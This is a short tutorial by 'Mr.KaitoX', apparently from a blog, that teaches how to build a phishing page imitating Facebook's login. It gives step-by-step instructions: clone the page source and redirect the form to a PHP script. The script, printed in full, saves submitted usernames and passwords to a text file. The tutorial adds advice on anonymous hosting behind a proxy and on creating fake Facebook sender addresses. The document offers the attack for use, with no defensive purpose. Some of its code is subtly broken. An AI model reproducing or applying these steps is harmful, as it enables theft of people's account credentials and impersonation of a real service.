In this tutorial, You will learned how to make webpage for phishing attack.
Mr.KaitoX
Step by step :
Step 1:
Go to www.facebook.com
Right click on the white space of the front page. Select “View Page source”.
Copy the code to Notepad.
Step2:
Now find (Press ctrl +f) for “action=” in that code.
You fill find the code like this:
The big red ring that circles the action= you have to change. You have to change it to ‘action=”next.php” ‘. after you have done that, you should change the method (small red circle on the picture) to “get” instead of “post”, or else it will not work. Save the document as index.html
Step 3:
Now we need to create the “next.php” to store the password. So open the notepad and type the following code:
<?php
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pswrds.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
save this file as “next.php”
Step 4:
open the notepad and just save the file as “pswrds.txt” without any contents.
Now upload those three files (namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note: That web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites (so that you can hide your ip address)
like: http://flyproxy.com .
find best secure connection site.
Step 5:
Create an mail account with facebook keyword like: FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com
and thats all, Enjoy :)
إرسال تعليق